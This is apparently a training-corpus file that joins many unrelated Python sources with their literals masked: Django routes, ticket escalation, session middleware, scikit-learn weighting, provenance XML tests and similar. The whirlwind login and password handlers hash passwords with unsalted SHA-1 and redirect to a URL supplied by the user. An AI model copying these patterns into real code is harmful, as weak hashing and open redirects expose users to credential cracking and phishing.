<s> """<STR_LIT>""" <EOL> from django . conf . urls import patterns , url <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT:index>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT:index>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from treeio . services . models import TicketQueue , TicketRecord <EOL> from django . core . urlresolvers import reverse <EOL> import datetime <EOL> def tickets_escalate ( ) : <EOL> "<STR_LIT>" <EOL> queues = TicketQueue . objects . filter ( <EOL> waiting_time__isnull = False , next_queue__isnull = False ) <EOL> now = datetime . datetime . now ( ) <EOL> for queue in queues : <EOL> if queue . waiting_time and queue . next_queue : <EOL> delta = datetime . timedelta ( seconds = int ( queue . waiting_time ) ) <EOL> timeframe = now - delta <EOL> tickets = queue . ticket_set . filter ( <EOL> date_created__lt = timeframe , status__active = True ) <EOL> for ticket in tickets : <EOL> updates = ticket . updates . filter ( <EOL> date_created__gte = timeframe ) . exists ( ) <EOL> if not updates : <EOL> ticket . queue = queue . next_queue <EOL> ticket . auto_notify = False <EOL> ticket . save ( ) <EOL> record = TicketRecord ( record_type = '<STR_LIT>' ) <EOL> record . format_message = '<STR_LIT>' + reverse ( '<STR_LIT>' , args = [ queue . id ] ) + '<STR_LIT>' + unicode ( queue ) + '<STR_LIT>' + reverse ( '<STR_LIT>' , args = [ queue . next_queue . id ] ) + '<STR_LIT>' + unicode ( queue . next_queue ) + '<STR_LIT>' <EOL> record . author = ticket . creator <EOL> record . save ( ) <EOL> record . about . add ( ticket ) <EOL> ticket . set_last_updated ( ) </s>
<s> from whirlwind . core . request import BaseRequest <EOL> from whirlwind . db . mongo import Mongo <EOL> from application . models . user import User <EOL> import datetime , hashlib <EOL> from tornado . web import authenticated <EOL> from whirlwind . view . decorators import route <EOL> @ route ( '<STR_LIT>' ) <EOL> class LogoutHandler ( BaseRequest ) : <EOL> def get ( self ) : <EOL> self . session [ '<STR_LIT:username>' ] = None <EOL> self . session . destroy ( ) <EOL> self . redirect ( "<STR_LIT:/>" ) <EOL> @ route ( '<STR_LIT>' ) <EOL> class LoginHandler ( BaseRequest ) : <EOL> def get ( self ) : <EOL> template_values = { } <EOL> template_values [ '<STR_LIT>' ] = self . get_argument ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> self . render_template ( '<STR_LIT>' , ** template_values ) <EOL> def post ( self ) : <EOL> username = self . get_argument ( "<STR_LIT:username>" , None ) <EOL> password = self . get_argument ( "<STR_LIT:password>" , None ) <EOL> if not username or not password : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> pw = hashlib . sha1 ( password ) . hexdigest ( ) <EOL> username = User . normalize ( username ) <EOL> user = User . lookup ( username ) <EOL> if not user or user [ '<STR_LIT:password>' ] != pw : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> if user . is_suspended ( ) : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT:/>" ) <EOL> return <EOL> user . history . last_login = datetime . datetime . utcnow ( ) <EOL> Mongo . db . ui . users . update ( { '<STR_LIT>' : username } , { <EOL> '<STR_LIT>' : { '<STR_LIT>' : user . history . last_login } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } <EOL> } ) <EOL> self . session [ '<STR_LIT:username>' ] = user . _id <EOL> if self . get_argument ( "<STR_LIT>" , False ) == "<STR_LIT>" : <EOL> self . session [ '<STR_LIT>' ] = True <EOL> self . 
set_current_user ( user ) <EOL> self . flash . notice = "<STR_LIT>" % user . _id <EOL> forwardUrl = self . get_argument ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> self . redirect ( forwardUrl ) <EOL> @ route ( '<STR_LIT>' ) <EOL> class SignupHandler ( BaseRequest ) : <EOL> def get ( self ) : <EOL> template_values = { } <EOL> template_values [ '<STR_LIT>' ] = self . get_argument ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> self . render_template ( '<STR_LIT>' , ** template_values ) <EOL> def post ( self ) : <EOL> username = self . get_argument ( "<STR_LIT:username>" , None ) <EOL> password = self . get_argument ( "<STR_LIT:password>" , None ) <EOL> if not username or not password : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> if password != self . get_argument ( "<STR_LIT>" , None ) : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> user = User . instance ( username , password ) <EOL> Mongo . db . ui . users . insert ( user ) <EOL> self . flash . info = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> class PasswordChanger ( BaseRequest ) : <EOL> @ authenticated <EOL> def post ( self ) : <EOL> pw = hashlib . sha1 ( self . get_argument ( "<STR_LIT:password>" ) ) . hexdigest ( ) <EOL> if self . get_current_user ( ) [ '<STR_LIT:password>' ] != pw : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> newPw = self . get_argument ( '<STR_LIT>' ) <EOL> newPw2 = self . get_argument ( '<STR_LIT>' ) <EOL> if newPw != newPw2 : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> password = hashlib . sha1 ( newPw ) . hexdigest ( ) <EOL> Mongo . db . ui . users . update ( { '<STR_LIT>' : self . get_username ( ) } , { <EOL> '<STR_LIT>' : { '<STR_LIT:password>' : password } <EOL> } ) <EOL> self . flash . success = "<STR_LIT>" <EOL> self . redirect ( '<STR_LIT>' ) </s>
from whirlwind.middleware.session.memcache import Session
from whirlwind.db.memcache_interface import Memcache
from tornado.options import options


class SessionMiddleware():
    """Request middleware that attaches a memcache-backed session to
    each request and persists it when the response goes out."""

    def __init__(self, request):
        # Fail fast when no memcache host has been configured; otherwise
        # make sure the shared memcache client exists before any session
        # work happens.
        if not options.memcache_host:
            raise Exception('<STR_LIT>')
        Memcache.create(host=options.memcache_host)
        self.request = request

    def request_hook(self):
        # Attach a fresh session object to the incoming request.
        self.request.session = Session(self.request)

    def response_hook(self):
        # Persist the session, then drop the reference from the request.
        self.request.session.save()
        del self.request.session

    def view_hook(self, view):
        # Expose the session to templates under a well-known key.
        view['<STR_LIT>'] = self.request.session
import numpy as np

from sklearn.externals import six

from .fixes import in1d, bincount


def compute_class_weight(class_weight, classes, y):
    """Estimate one weight per class.

    `class_weight` is None, the automatic-mode string, or a dict mapping
    class label -> weight; `classes` is the sorted array of distinct
    labels; `y` holds the original labels.  Returns a float64 ndarray of
    shape (len(classes),) aligned with `classes`.
    """
    # Imported here rather than at module level, presumably to avoid a
    # circular import with sklearn.preprocessing -- confirm.
    from sklearn.preprocessing import LabelEncoder
    if class_weight is None or len(class_weight) == <NUM_LIT:0>:
        # No weighting requested: uniform weights.
        weight = np.ones(classes.shape[<NUM_LIT:0>], dtype=np.float64, order='<STR_LIT:C>')
    elif class_weight == '<STR_LIT>':
        # Automatic mode: weights inversely proportional to class
        # frequency, normalised so the weights average to 1.
        le = LabelEncoder()
        y_ind = le.fit_transform(y)
        if not all(np.in1d(classes, le.classes_)):
            raise ValueError("<STR_LIT>")
        recip_freq = <NUM_LIT:1.> / bincount(y_ind)
        weight = recip_freq[le.transform(classes)] / np.mean(recip_freq)
    else:
        # Explicit dict mode: start uniform, override listed classes.
        weight = np.ones(classes.shape[<NUM_LIT:0>], dtype=np.float64, order='<STR_LIT:C>')
        if not isinstance(class_weight, dict):
            raise ValueError("<STR_LIT>"
                             "<STR_LIT>" % class_weight)
        for c in class_weight:
            # `classes` must be sorted for searchsorted to locate c.
            i = np.searchsorted(classes, c)
            if classes[i] != c:
                raise ValueError("<STR_LIT>" % c)
            else:
                weight[i] = class_weight[c]
    return weight


def compute_sample_weight(class_weight, y, indices=None):
    """Compute one weight per sample from class weights.

    `y` may be 1-D or 2-D (multi-output); per-output weights are
    multiplied together into a single float64 vector.  `indices`
    restricts the frequency estimation to a subsample (only valid with
    the string mode); samples whose class is absent from the subsample
    get weight 0.
    """
    y = np.atleast_1d(y)
    if y.ndim == <NUM_LIT:1>:
        # Treat 1-D input as a single output column.
        y = np.reshape(y, (-<NUM_LIT:1>, <NUM_LIT:1>))
    n_outputs = y.shape[<NUM_LIT:1>]
    if isinstance(class_weight, six.string_types):
        if class_weight != '<STR_LIT>':
            raise ValueError('<STR_LIT>'
                             '<STR_LIT>' % class_weight)
    elif (indices is not None and
          not isinstance(class_weight, six.string_types)):
        # Subsampling only makes sense for the frequency-based mode.
        raise ValueError('<STR_LIT>'
                         '<STR_LIT>' % class_weight)
    elif n_outputs > <NUM_LIT:1>:
        # Multi-output requires a sequence of dicts, one per output.
        if (not hasattr(class_weight, "<STR_LIT>") or
                isinstance(class_weight, dict)):
            raise ValueError("<STR_LIT>"
                             "<STR_LIT>")
        if len(class_weight) != n_outputs:
            raise ValueError("<STR_LIT>"
                             "<STR_LIT>")
    expanded_class_weight = []
    for k in range(n_outputs):
        y_full = y[:, k]
        classes_full = np.unique(y_full)
        classes_missing = None
        if class_weight == '<STR_LIT>' or n_outputs == <NUM_LIT:1>:
            class_weight_k = class_weight
        else:
            class_weight_k = class_weight[k]
        if indices is not None:
            # Estimate weights on the subsample only, then spread them
            # back onto the full class set (the mode placeholder is
            # presumably 'clip' to keep indices in range -- confirm).
            y_subsample = y[indices, k]
            classes_subsample = np.unique(y_subsample)
            weight_k = np.choose(np.searchsorted(classes_subsample,
                                                 classes_full),
                                 compute_class_weight(class_weight_k,
                                                      classes_subsample,
                                                      y_subsample),
                                 mode='<STR_LIT>')
            classes_missing = set(classes_full) - set(classes_subsample)
        else:
            weight_k = compute_class_weight(class_weight_k,
                                            classes_full,
                                            y_full)
        # Map per-class weights onto each sample of this output.
        weight_k = weight_k[np.searchsorted(classes_full, y_full)]
        if classes_missing:
            # Classes absent from the subsample contribute zero weight.
            weight_k[in1d(y_full, list(classes_missing))] = <NUM_LIT:0.>
        expanded_class_weight.append(weight_k)
    # Multiply the per-output weights into one per-sample vector.
    expanded_class_weight = np.prod(expanded_class_weight,
                                    axis=<NUM_LIT:0>,
                                    dtype=np.float64)
    return expanded_class_weight
from __future__ import unicode_literals

from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.models import AbstractUser


class CustomUser(AbstractUser):
    """Project user model; inherits every field and behavior from
    Django's AbstractUser without modification."""


# Expose the custom user model in the admin with the stock UserAdmin.
admin.site.register(CustomUser, UserAdmin)
# Environment probe: collect platform / Python / user details into a dict.
# Python 2-era code (pip.get_installed_distributions below).
try:
    # Unix-only modules; absent on Windows, which surfaces as a
    # NameError when they are used and is handled below.
    import grp
    import pwd
except ImportError:
    pass
import pip
import platform
import tempfile
import os
import getpass


def return_error(facility, message='<STR_LIT>'):
    """Report `message` through `facility` (a callable, e.g. a logger
    method); fall back to printing when no facility is given."""
    if facility:
        facility(message)
    else:
        print(message)


def env():
    """Return a dict describing the platform, Python runtime, installed
    packages, relevant paths and the current user/group.

    Raises Exception on OS-detection failures and NotImplementedError
    for unrecognised platforms.  Dict keys are extraction placeholders
    here -- confirm the real names against the consumer.
    """
    p = {}
    p['<STR_LIT>'] = platform.platform() or None
    p['<STR_LIT>'] = platform.python_version() or None
    try:
        # First character of the version string, i.e. the major version.
        p['<STR_LIT>'] = p['<STR_LIT>'][<NUM_LIT:0>]
    except TypeError:
        # The version entry was normalised to None above.
        p['<STR_LIT>'] = None
    p['<STR_LIT>'] = '<STR_LIT:.>'.join(platform.python_version().split('<STR_LIT:.>')[<NUM_LIT:0>:<NUM_LIT:2>]) or None
    # NOTE(review): pip.get_installed_distributions() is a private API
    # removed in modern pip; pkg_resources / importlib.metadata is the
    # supported route.
    p['<STR_LIT>'] = ["<STR_LIT>" % (pkg.key, pkg.version) for pkg in pip.get_installed_distributions()]
    p['<STR_LIT>'] = os.path.join(os.path.expanduser('<STR_LIT>'))
    p['<STR_LIT>'] = os.path.join(p['<STR_LIT>'], '<STR_LIT>') or None
    p['<STR_LIT>'] = tempfile.gettempdir()
    try:
        # POSIX path: uid/gid/username/group from the pwd/grp databases.
        pwuid = pwd.getpwuid(os.getuid())
        p['<STR_LIT>'] = pwuid[<NUM_LIT:2>]
        p['<STR_LIT>'] = pwuid[<NUM_LIT:3>]
        p['<STR_LIT>'] = pwuid[<NUM_LIT:0>]
        p['<STR_LIT>'] = grp.getgrgid(pwd.getpwnam(p['<STR_LIT>']).pw_gid).gr_name
    except NameError:
        # pwd/grp were never imported (non-POSIX): best-effort username.
        try:
            p['<STR_LIT>'] = getpass.getuser()
        except AttributeError:
            p['<STR_LIT>'] = None
        finally:
            # uid/gid/group have no meaning here; null them out.
            p['<STR_LIT>'] = p['<STR_LIT>'] = p['<STR_LIT>'] = None
    if platform.system() == '<STR_LIT>':
        # mac_ver() usage suggests this is the Darwin branch -- confirm.
        try:
            p['<STR_LIT:type>'] = '<STR_LIT>'
            p['<STR_LIT>'] = platform.system_alias(platform.system(), platform.release(), platform.mac_ver())[<NUM_LIT:0>] or None
            p['<STR_LIT>'] = platform.mac_ver()[<NUM_LIT:0>] or None
        except Exception as e:
            raise Exception('<STR_LIT>'.format(e))
    elif platform.system() == '<STR_LIT>':
        # linux_distribution() usage suggests the Linux branch -- confirm.
        try:
            dist_info = platform.linux_distribution()
            p['<STR_LIT:type>'] = '<STR_LIT>'
            p['<STR_LIT>'] = dist_info[<NUM_LIT:0>] or None
            p['<STR_LIT>'] = dist_info[<NUM_LIT:1>] or None
        except Exception as e:
            raise Exception('<STR_LIT>'.format(e))
    elif platform.system() == '<STR_LIT>':
        # win32_ver() usage suggests the Windows branch -- confirm.
        try:
            p['<STR_LIT:type>'] = '<STR_LIT>'
            p['<STR_LIT>'] = str(platform.system() + platform.release()) or None
            p['<STR_LIT>'] = platform.win32_ver()[<NUM_LIT:0>] or None
        except Exception as e:
            raise Exception('<STR_LIT>'.format(e))
    else:
        # Unknown platform: try the Linux path, otherwise give up loudly.
        try:
            dist_info = platform.linux_distribution()
            p['<STR_LIT>'] = dist_info[<NUM_LIT:0>] or None
            p['<STR_LIT:type>'] = '<STR_LIT>'
            p['<STR_LIT>'] = dist_info[<NUM_LIT:1>] or None
        except Exception as e:
            raise NotImplementedError('<STR_LIT>'.format(e))
    return p


if __name__ == '<STR_LIT:__main__>':
    print(env())
<s> from itty import * <EOL> from tropo import Tropo , Session <EOL> @ post ( '<STR_LIT>' ) <EOL> def index ( request ) : <EOL> s = Session ( request . body ) <EOL> t = Tropo ( ) <EOL> t . say ( '<STR_LIT>' , _as = '<STR_LIT>' , voice = '<STR_LIT>' ) <EOL> json = t . RenderJson ( ) <EOL> print json <EOL> return json <EOL> run_itty ( ) </s>
import types

from dopplr.basequery import BaseQuery


class MoreLikeThisQuery(BaseQuery):
    """Query component that enables Solr's MoreLikeThis handling and
    carries its optional tuning parameters."""

    def __init__(self, fields, mintf=None, mindf=None, minwl=None, maxwl=None,
                 maxqt=None, maxntp=None, boost=False, qf=None, count=None,
                 stream_body=None):
        """Store the similarity fields plus the optional MLT knobs."""
        if not isinstance(fields, types.ListType):
            raise TypeError('<STR_LIT>')
        self._fields = fields
        self._optional_params = {}
        # NOTE: falsy values (None, False, 0) are skipped by get_params().
        for option_key, option_value in (
                ('<STR_LIT>', mintf),
                ('<STR_LIT>', mindf),
                ('<STR_LIT>', minwl),
                ('<STR_LIT>', maxwl),
                ('<STR_LIT>', maxqt),
                ('<STR_LIT>', maxntp),
                ('<STR_LIT>', boost),
                ('<STR_LIT>', qf),
                ('<STR_LIT:count>', count)):
            self._optional_params[option_key] = option_value
        self.stream_body = stream_body

    def get_params(self):
        """Return the (name, value) query parameters for this component."""
        params = [('<STR_LIT>', '<STR_LIT:true>'),
                  ('<STR_LIT>', '<STR_LIT:U+002C>'.join(self._fields))]
        for option, value in self._optional_params.items():
            if value:
                params.append(('<STR_LIT>' % option, value))
        if self.stream_body:
            params.append(('<STR_LIT>', self.stream_body))
        return params
"""Time-bounded memoization for callback-style (CPS) functions."""
from datetime import datetime, timedelta
from functools import wraps


def cache_key(*args, **kwargs):
    """Derive a cache key string from the positional arguments.

    Callables are keyed by their repr(); everything else by str().
    Keyword arguments are deliberately ignored so the callback keyword
    never affects the key.
    """
    parts = ["<STR_LIT>"]
    for value in args:
        if callable(value):
            parts.append("<STR_LIT>" % repr(value))
        else:
            parts.append("<STR_LIT>" % str(value))
    return "".join(parts)


class Cache(object):
    """Memoizing decorator for functions that deliver their result via a
    callback keyword argument.

    The wrapped function must accept its callback under the keyword
    named ``cbname``.  Results are held for ``ttl`` (a
    ``datetime.timedelta``) and replayed straight to the callback on
    later calls with the same key; expired entries fall through to a
    fresh invocation of the wrapped function.
    """

    def __init__(self, ttl, cbname="<STR_LIT>", cache_key_method=cache_key):
        self.ttl = ttl
        self.cbname = cbname
        self.cache_key_method = cache_key_method
        self.cache = {}
        self.func = None

    def __call__(self, func):
        self.func = func

        @wraps(func)
        def wrapper(*args, **kwargs):
            # Delegate; like the wrapped CPS function, nothing is returned.
            self._cached_func(*args, **kwargs)

        return wrapper

    def _cached_func(self, *args, **kwargs):
        callback = kwargs.get(self.cbname)
        key = self.cache_key_method(*args, **kwargs)
        entry = self.cache.get(key)
        if entry is not None:
            result, expires_at = entry
            if expires_at > datetime.now():
                # Fresh hit: replay the stored result to the caller.
                callback(result)
                return
        # Miss or stale entry: intercept the callback so the produced
        # result gets stored before being forwarded.
        kwargs[self.cbname] = self._caching_callback(key, callback)
        self.func(*args, **kwargs)

    def _caching_callback(self, key, callback):
        def remember(result):
            self.cache[key] = (result, datetime.now() + self.ttl)
            callback(result)

        return remember
from __future__ import (absolute_import, division, print_function,
                        unicode_literals)

import difflib
import glob
import inspect
import io
from lxml import etree
import os
import unittest
import warnings

from prov.identifier import Namespace, QualifiedName
from prov.constants import PROV
import prov.model as prov

from prov.tests.test_model import AllTestsBase
from prov.tests.utility import RoundTripTestCase

# (prefix, URI) pairs for the example namespaces used throughout.
EX_NS = ('<STR_LIT>', '<STR_LIT>')
EX_TR = ('<STR_LIT>', '<STR_LIT>')

# Directory of the reference PROV-XML fixture files, resolved relative
# to this source file.
DATA_PATH = os.path.join(os.path.dirname(os.path.abspath(inspect.getfile(
    inspect.currentframe()))), "<STR_LIT>")


def remove_empty_tags(tree):
    """Recursively blank out whitespace-only text nodes so they do not
    affect the canonicalised comparison."""
    if tree.text is not None and tree.text.strip() == "<STR_LIT>":
        tree.text = None
    for elem in tree:
        if etree.iselement(elem):
            remove_empty_tags(elem)


def compare_xml(doc1, doc2):
    """Assert two XML documents (paths or file-like objects) are equal.

    Both inputs are parsed, stripped of ignorable nodes, canonicalised
    (C14N) and diffed line by line; an AssertionError carrying the
    unified diff is raised on mismatch.
    """
    # Rewind file-like inputs; plain paths lack seek() and pass through.
    try:
        doc1.seek(<NUM_LIT:0>, <NUM_LIT:0>)
    except AttributeError:
        pass
    try:
        doc2.seek(<NUM_LIT:0>, <NUM_LIT:0>)
    except AttributeError:
        pass
    obj1 = etree.parse(doc1)
    obj2 = etree.parse(doc2)
    # Remove nodes matched by this XPath (placeholder hides the
    # expression; presumably comments or similar -- confirm).
    for c in obj1.getroot().xpath("<STR_LIT>"):
        p = c.getparent()
        p.remove(c)
    for c in obj2.getroot().xpath("<STR_LIT>"):
        p = c.getparent()
        p.remove(c)
    remove_empty_tags(obj1.getroot())
    remove_empty_tags(obj2.getroot())
    # Canonicalise both trees and compare their non-blank lines.
    buf = io.BytesIO()
    obj1.write_c14n(buf)
    buf.seek(<NUM_LIT:0>, <NUM_LIT:0>)
    str1 = buf.read().decode()
    str1 = [_i.strip() for _i in str1.splitlines() if _i.strip()]
    buf = io.BytesIO()
    obj2.write_c14n(buf)
    buf.seek(<NUM_LIT:0>, <NUM_LIT:0>)
    str2 = buf.read().decode()
    str2 = [_i.strip() for _i in str2.splitlines() if _i.strip()]
    unified_diff = difflib.unified_diff(str1, str2)
    err_msg = "<STR_LIT:\n>".join(unified_diff)
    if err_msg:
        msg = "<STR_LIT>"
        raise AssertionError(msg + err_msg)


class ProvXMLTestCase(unittest.TestCase):
    # Serialization / deserialization checks against the reference
    # fixture documents in DATA_PATH.

    def test_serialization_example_6(self):
        """Serialize a typed entity and compare against the fixture."""
        document = prov.ProvDocument()
        ex_ns = document.add_namespace(*EX_NS)
        document.add_namespace(*EX_TR)
        document.entity("<STR_LIT>", (
            (prov.PROV_TYPE, ex_ns["<STR_LIT>"]),
            ("<STR_LIT>", "<STR_LIT:2>")
        ))
        with io.BytesIO() as actual:
            document.serialize(format='<STR_LIT>', destination=actual)
            compare_xml(os.path.join(DATA_PATH, "<STR_LIT>"), actual)

    def test_serialization_example_7(self):
        """Serialize an activity with attributes and compare to fixture."""
        document = prov.ProvDocument()
        document.add_namespace(*EX_NS)
        document.activity(
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>", [
                (prov.PROV_TYPE, prov.Literal("<STR_LIT>", prov.XSD_QNAME)),
                ("<STR_LIT>", "<STR_LIT>")])
        with io.BytesIO() as actual:
            document.serialize(format='<STR_LIT>', destination=actual)
            compare_xml(os.path.join(DATA_PATH, "<STR_LIT>"), actual)

    def test_serialization_example_8(self):
        """Serialize two wasGeneratedBy relations and compare to fixture."""
        document = prov.ProvDocument()
        document.add_namespace(*EX_NS)
        e1 = document.entity("<STR_LIT>")
        a1 = document.activity("<STR_LIT>")
        document.wasGeneratedBy(entity=e1, activity=a1,
                                time="<STR_LIT>",
                                other_attributes={"<STR_LIT>": "<STR_LIT>"})
        e2 = document.entity("<STR_LIT>")
        document.wasGeneratedBy(entity=e2, activity=a1,
                                time="<STR_LIT>",
                                other_attributes={"<STR_LIT>": "<STR_LIT>"})
        with io.BytesIO() as actual:
            document.serialize(format='<STR_LIT>', destination=actual)
            compare_xml(os.path.join(DATA_PATH, "<STR_LIT>"), actual)

    def test_deserialization_example_6(self):
        """Deserialize fixture 6 and compare to a hand-built document."""
        actual_doc = prov.ProvDocument.deserialize(
            source=os.path.join(DATA_PATH, "<STR_LIT>"),
            format="<STR_LIT>")
        expected_document = prov.ProvDocument()
        ex_ns = expected_document.add_namespace(*EX_NS)
        expected_document.add_namespace(*EX_TR)
        expected_document.entity("<STR_LIT>", (
            (prov.PROV_TYPE, ex_ns["<STR_LIT>"]),
            ("<STR_LIT>", "<STR_LIT:2>")
        ))
        self.assertEqual(actual_doc, expected_document)

    def test_deserialization_example_7(self):
        """Deserialize fixture 7 and compare to a hand-built document."""
        actual_doc = prov.ProvDocument.deserialize(
            source=os.path.join(DATA_PATH, "<STR_LIT>"),
            format="<STR_LIT>")
        expected_document = prov.ProvDocument()
        ex_ns = Namespace(*EX_NS)
        expected_document.add_namespace(ex_ns)
        expected_document.activity(
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>", [
                (prov.PROV_TYPE, QualifiedName(ex_ns, "<STR_LIT>")),
                ("<STR_LIT>", "<STR_LIT>")])
        self.assertEqual(actual_doc, expected_document)

    def test_deserialization_example_04_and_05(self):
        """Deserialize two inline XML snippets carrying multiple
        prov:type entries and compare to hand-built documents."""
        xml_string = """<STR_LIT>"""
        with io.StringIO() as xml:
            xml.write(xml_string)
            xml.seek(<NUM_LIT:0>, <NUM_LIT:0>)
            actual_document = prov.ProvDocument.deserialize(source=xml,
                                                            format="<STR_LIT>")
        expected_document = prov.ProvDocument()
        ex_ns = Namespace(*EX_NS)
        expected_document.add_namespace(ex_ns)
        expected_document.add_namespace(*EX_TR)
        expected_document.entity("<STR_LIT>", (
            (prov.PROV_TYPE, QualifiedName(ex_ns, "<STR_LIT>")),
            (prov.PROV_TYPE, PROV["<STR_LIT>"])))
        self.assertEqual(actual_document, expected_document, "<STR_LIT>")
        xml_string = """<STR_LIT>"""
        with io.StringIO() as xml:
            xml.write(xml_string)
            xml.seek(<NUM_LIT:0>, <NUM_LIT:0>)
            actual_document = prov.ProvDocument.deserialize(source=xml,
                                                            format="<STR_LIT>")
        expected_document = prov.ProvDocument()
        expected_document.add_namespace(*EX_NS)
        expected_document.add_namespace(*EX_TR)
        # NOTE: reuses `ex_ns` bound in the first half of this test.
        expected_document.entity("<STR_LIT>", (
            (prov.PROV_TYPE, QualifiedName(ex_ns, "<STR_LIT>")),
            (prov.PROV_TYPE, PROV["<STR_LIT>"]),
            (prov.PROV_TYPE, PROV["<STR_LIT>"])
        ))
        self.assertEqual(actual_document, expected_document, "<STR_LIT>")

    def test_other_elements(self):
        """Foreign (non-PROV) XML elements are skipped with one warning
        and produce no records."""
        xml_string = """<STR_LIT>"""
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("<STR_LIT>")
            with io.StringIO() as xml:
                xml.write(xml_string)
                xml.seek(<NUM_LIT:0>, <NUM_LIT:0>)
                doc = prov.ProvDocument.deserialize(source=xml, format="<STR_LIT>")
        self.assertEqual(len(w), <NUM_LIT:1>)
        self.assertTrue(
            "<STR_LIT>"
            "<STR_LIT>" in str(w[<NUM_LIT:0>].message))
        self.assertEqual(len(doc._records), <NUM_LIT:0>)

    def test_nested_default_namespace(self):
        """A nested default namespace is applied to record identifiers."""
        filename = os.path.join(DATA_PATH, "<STR_LIT>")
        doc = prov.ProvDocument.deserialize(source=filename, format="<STR_LIT>")
        ns = Namespace("<STR_LIT>", "<STR_LIT>")
        self.assertEqual(len(doc._records), <NUM_LIT:1>)
        self.assertEqual(doc.get_default_namespace(), ns)
        self.assertEqual(doc._records[<NUM_LIT:0>].identifier.namespace, ns)
        self.assertEqual(doc._records[<NUM_LIT:0>].identifier.localpart, "<STR_LIT>")

    def test_redefining_namespaces(self):
        """A prefix redefined to a different URI yields a distinct
        namespace object on the parsed attributes."""
        filename = os.path.join(DATA_PATH,
                                "<STR_LIT>")
        doc = prov.ProvDocument.deserialize(source=filename, format="<STR_LIT>")
        self.assertEqual(len(doc._records), <NUM_LIT:1>)
        ns = Namespace("<STR_LIT>", "<STR_LIT>")
        self.assertEqual(doc._records[<NUM_LIT:0>].attributes[<NUM_LIT:0>][<NUM_LIT:1>].namespace, ns)
        filename = os.path.join(DATA_PATH, "<STR_LIT>")
        doc = prov.ProvDocument.deserialize(source=filename, format="<STR_LIT>")
        new_ns = doc._records[<NUM_LIT:0>].attributes[<NUM_LIT:0>][<NUM_LIT:1>].namespace
        self.assertNotEqual(new_ns, ns)
        self.assertEqual(new_ns.uri, "<STR_LIT>")


class ProvXMLRoundTripFromFileTestCase(unittest.TestCase):
    # Round-trip test methods are meant to be generated per fixture file
    # by the module-level loop below.

    def _perform_round_trip(self, filename, force_types=False):
        """Deserialize `filename`, reserialize it, assert XML equality."""
        document = prov.ProvDocument.deserialize(
            source=filename, format="<STR_LIT>")
        with io.BytesIO() as new_xml:
            document.serialize(format='<STR_LIT>', destination=new_xml,
                               force_types=force_types)
            compare_xml(filename, new_xml)


# Build one round-trip test function per fixture file, skipping files
# from a known-problem list.
for filename in glob.iglob(os.path.join(
        DATA_PATH, "<STR_LIT:*>" + os.path.extsep + "<STR_LIT>")):
    name = os.path.splitext(os.path.basename(filename))[<NUM_LIT:0>]
    test_name = "<STR_LIT>" % name
    if name in ("<STR_LIT>",
                "<STR_LIT>",
                "<STR_LIT>",
                "<STR_LIT>"):
        continue

    def get_fct(f):
        # The current filename is bound via the argument `f`; `name` is
        # read at call time, which is safe because get_fct is invoked
        # immediately in each iteration.
        if name in ["<STR_LIT>"]:
            force_types = True
        else:
            force_types = False

        def fct(self):
            self._perform_round_trip(f, force_types=force_types)
        return fct

    fct = get_fct(filename)
    fct.__name__ = str(test_name)
    # NOTE(review): `fct` is never attached to
    # ProvXMLRoundTripFromFileTestCase (no setattr call is visible), so
    # these generated tests are never collected -- confirm whether a
    # setattr line was lost.


class RoundTripXMLTests(RoundTripTestCase, AllTestsBase):
    # Run the shared model test-suite through the XML serializer.
    FORMAT = '<STR_LIT>'


if __name__ == '<STR_LIT:__main__>':
    unittest.main()
# Installer-recipe metadata consumed by a framework module loader:
# author, description, install type, repository/install locations,
# per-distro dependency lists, post-install commands and launcher name.
# Values are extraction placeholders -- confirm against the loader.
AUTHOR = "<STR_LIT>"
DESCRIPTION = "<STR_LIT>"
